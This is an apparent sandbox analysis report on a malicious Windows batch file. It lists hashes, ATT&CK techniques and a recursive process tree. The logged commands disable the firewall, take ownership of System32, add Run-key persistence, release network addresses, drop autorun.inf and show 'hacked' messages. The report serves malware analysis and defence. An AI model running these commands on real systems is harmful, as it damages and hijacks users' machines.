29415d32850d821d9854bfd6edabee920052e0920e6eceec187ea57b8a3c707e

Analysis

max time kernel
8s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
25-05-2024 23:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.bat
Size

17KB
MD5

591700c81fbd38cf8c83092030536c14
SHA1

a122ca4b91ec2275400e10f21093c43186391c97
SHA256

29415d32850d821d9854bfd6edabee920052e0920e6eceec187ea57b8a3c707e
SHA512

ae3e1ffef5a82016f13fe728a8a3f2696ed55cdd9ea60d6e75352d55f95fe71cb09bad02945601d4661818473882cc4fae4493d9125e3803054e69c861a97758
SSDEEP

192:Un0iMJWap3ahz9j3E301VaYYATCdhSouXKN:ZJWo3yzHVbYMW

Score

8^/10

discovery evasion persistence

Malware Config

Signatures

Modifies Windows Firewall 2 TTPs 3 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exe

pid process

8564 netsh.exe
8348 netsh.exe
8512 netsh.exe

pid	process
8564	netsh.exe
8348	netsh.exe
8512	netsh.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.execmd.execmd.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	cmd.exe

Modifies file permissions 1 TTPs 13 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
8484	takeown.exe
9712	takeown.exe
3996	takeown.exe
6092	takeown.exe
6084	takeown.exe
7528	takeown.exe
9580	takeown.exe
9720	takeown.exe
6028	takeown.exe
9568	takeown.exe
2988	takeown.exe
3592	takeown.exe
6384	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Twain_20 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Twain_20.cmd"	reg.exe

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

cmd.exeattrib.execmd.execmd.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe

Drops file in System32 directory 5 IoCs

Processes:

cmd.execmd.execmd.execmd.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File created	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe

Drops file in Windows directory 3 IoCs

Processes:

mspaint.exemspaint.exemspaint.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Gathers network information 2 TTPs 13 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	process
440	ipconfig.exe
1780	ipconfig.exe
4924	ipconfig.exe
10084	ipconfig.exe
10192	ipconfig.exe
3792	ipconfig.exe
1892	ipconfig.exe
10104	ipconfig.exe
924	ipconfig.exe
10152	ipconfig.exe
9976	ipconfig.exe
6072	ipconfig.exe
6112	ipconfig.exe

Kills process with taskkill 13 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4992	taskkill.exe
1868	taskkill.exe
3972	taskkill.exe
5188	taskkill.exe
9812	taskkill.exe
8580	taskkill.exe
4684	taskkill.exe
2344	taskkill.exe
3544	taskkill.exe
7984	taskkill.exe
3828	taskkill.exe
9740	taskkill.exe
10256	taskkill.exe

Modifies registry class 9 IoCs

Processes:

cmd.exeexplorer.exeexplorer.exeexplorer.execalc.execmd.execalc.execmd.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

mspaint.exemspaint.exemspaint.exe

pid process

2996 mspaint.exe
2996 mspaint.exe
1688 mspaint.exe
1688 mspaint.exe
3284 mspaint.exe
3284 mspaint.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

takeown.exetaskkill.exe

description pid process

Token: SeTakeOwnershipPrivilege 2988 takeown.exe
Token: SeDebugPrivilege 4992 taskkill.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	2988	takeown.exe
Token: SeDebugPrivilege	4992	taskkill.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

mspaint.exemspaint.exemspaint.exeOpenWith.exeOpenWith.exe

pid	process
2996	mspaint.exe
1688	mspaint.exe
2996	mspaint.exe
2996	mspaint.exe
2996	mspaint.exe
1688	mspaint.exe
1688	mspaint.exe
1688	mspaint.exe
3284	mspaint.exe
3284	mspaint.exe
3284	mspaint.exe
3284	mspaint.exe
972	OpenWith.exe
5096	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 3376 wrote to memory of 1552	3376	cmd.exe	cmd.exe
PID 3376 wrote to memory of 1552	3376	cmd.exe	cmd.exe
PID 3376 wrote to memory of 4396	3376	cmd.exe	cmd.exe
PID 3376 wrote to memory of 4396	3376	cmd.exe	cmd.exe
PID 3376 wrote to memory of 1776	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 1776	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 1736	3376	cmd.exe	cmd.exe
PID 3376 wrote to memory of 1736	3376	cmd.exe	cmd.exe
PID 3376 wrote to memory of 5080	3376	cmd.exe	reg.exe
PID 3376 wrote to memory of 5080	3376	cmd.exe	reg.exe
PID 3376 wrote to memory of 1016	3376	cmd.exe	reg.exe
PID 3376 wrote to memory of 1016	3376	cmd.exe	reg.exe
PID 3376 wrote to memory of 1892	3376	cmd.exe	ipconfig.exe
PID 3376 wrote to memory of 1892	3376	cmd.exe	ipconfig.exe
PID 1736 wrote to memory of 2988	1736	cmd.exe	takeown.exe
PID 1736 wrote to memory of 2988	1736	cmd.exe	takeown.exe
PID 3376 wrote to memory of 4992	3376	cmd.exe	taskkill.exe
PID 3376 wrote to memory of 4992	3376	cmd.exe	taskkill.exe
PID 3376 wrote to memory of 228	3376	cmd.exe	attrib.exe
PID 3376 wrote to memory of 228	3376	cmd.exe	attrib.exe
PID 3376 wrote to memory of 3304	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 3304	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 3096	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 3096	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 5112	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 5112	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 4928	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 4928	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 1568	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 1568	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 4564	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 4564	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 4044	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 4044	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 4576	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 4576	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 3508	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 3508	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 2216	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 2216	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 556	3376	cmd.exe	msg.exe
PID 3376 wrote to memory of 556	3376	cmd.exe	msg.exe
PID 3376 wrote to memory of 464	3376	cmd.exe	explorer.exe
PID 3376 wrote to memory of 464	3376	cmd.exe	explorer.exe
PID 3376 wrote to memory of 2732	3376	cmd.exe	Conhost.exe
PID 3376 wrote to memory of 2732	3376	cmd.exe	Conhost.exe
PID 3376 wrote to memory of 1580	3376	cmd.exe	cmd.exe
PID 3376 wrote to memory of 1580	3376	cmd.exe	cmd.exe
PID 3376 wrote to memory of 2712	3376	cmd.exe	notepad.exe
PID 3376 wrote to memory of 2712	3376	cmd.exe	notepad.exe
PID 3376 wrote to memory of 8	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 8	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 2668	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 2668	3376	cmd.exe	WScript.exe
PID 3376 wrote to memory of 2996	3376	cmd.exe	mspaint.exe
PID 3376 wrote to memory of 2996	3376	cmd.exe	mspaint.exe
PID 3376 wrote to memory of 1524	3376	cmd.exe	cmd.exe
PID 3376 wrote to memory of 1524	3376	cmd.exe	cmd.exe
PID 3376 wrote to memory of 4744	3376	cmd.exe	notepad.exe
PID 3376 wrote to memory of 4744	3376	cmd.exe	notepad.exe
PID 3376 wrote to memory of 468	3376	cmd.exe	calc.exe
PID 3376 wrote to memory of 468	3376	cmd.exe	calc.exe
PID 3376 wrote to memory of 1132	3376	cmd.exe	explorer.exe
PID 3376 wrote to memory of 1132	3376	cmd.exe	explorer.exe

Views/modifies file attributes 1 TTPs 13 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
12776	attrib.exe
1632	attrib.exe
7668	attrib.exe
5580	attrib.exe
1280	attrib.exe
7288	attrib.exe
10096	attrib.exe
12880	attrib.exe
228	attrib.exe
4656	attrib.exe
5824	attrib.exe
10112	attrib.exe
5600	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
1⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
2⤵
PID:1552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
2⤵
PID:4396

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
2⤵
PID:1776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
2⤵
PID:5080

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
2⤵
PID:1016

C:\Windows\system32\ipconfig.exe
ipconfig /release
2⤵
- Gathers network information
PID:1892

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4992

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
2⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:228

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:3304

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:3096

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:5112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:4928

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:1568

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:4564

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:4044

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:4576

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:3508

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:2216

C:\Windows\system32\msg.exe
msg * Virus Detectado
2⤵
PID:556

C:\Windows\system32\msg.exe
msg * Virus Detectado
2⤵
PID:464

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
2⤵
PID:2732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
PID:1580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:5148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:5156

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
3⤵
PID:5508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
3⤵
PID:5720

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
4⤵
- Modifies file permissions
PID:6028

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:6048

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:3572

C:\Windows\system32\ipconfig.exe
ipconfig /release
3⤵
- Gathers network information
PID:440

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
3⤵
- Kills process with taskkill
PID:5188

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
3⤵
- Views/modifies file attributes
PID:1280

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:5812

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:5520

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:5960

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:4684

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:5216

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:5224

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:3904

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:2264

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:6188

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:6212

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:6280

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:6472

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
3⤵
PID:6848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:544

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
4⤵
- Modifies Windows Firewall
PID:8512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:8924

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:8828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:8560

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
PID:9568

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:9704

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:9944

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:10104

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:9740

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Views/modifies file attributes
PID:5600

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:11788

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:12056

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:5124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:9092

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:6208

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:11112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:2528

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:12508

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:12728

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:12976

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
4⤵
PID:13220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:7496

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:5368

C:\Windows\system32\calc.exe
calc
4⤵
PID:12976

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:13248

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:12468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:12800

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:8684

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6596

C:\Windows\system32\calc.exe
calc
3⤵
PID:6708

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:464

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:7008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:9744

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
5⤵
PID:7384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:1204

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:10560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:10744

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
PID:6384

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:7668

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:1652

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:9976

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:8580

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Views/modifies file attributes
PID:12776

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:7228

C:\Windows\system32\calc.exe
calc
3⤵
PID:7304

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:7508

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6304

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:10112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:5560

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:10708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:10856

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
PID:3592

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:5580

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:3040

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:6072

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:10256

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Views/modifies file attributes
PID:12880

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:4664

C:\Windows\system32\calc.exe
calc
3⤵
PID:7568

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6044

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7940

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:8740

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:9000

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:9132

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:8572

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:9124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:9372

C:\Windows\system32\notepad.exe
notepad
2⤵
PID:2712

C:\Windows\system32\calc.exe
calc
2⤵
- Modifies registry class
PID:8

C:\Windows\explorer.exe
explorer.exe
2⤵
- Modifies registry class
PID:2668

C:\Windows\system32\mspaint.exe
mspaint.exe
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
PID:1524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:1672

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
4⤵
- Adds Run key to start application
PID:5172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:3332

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
3⤵
PID:5484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
3⤵
PID:5712

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
4⤵
- Modifies file permissions
PID:6092

C:\Windows\system32\reg.exe
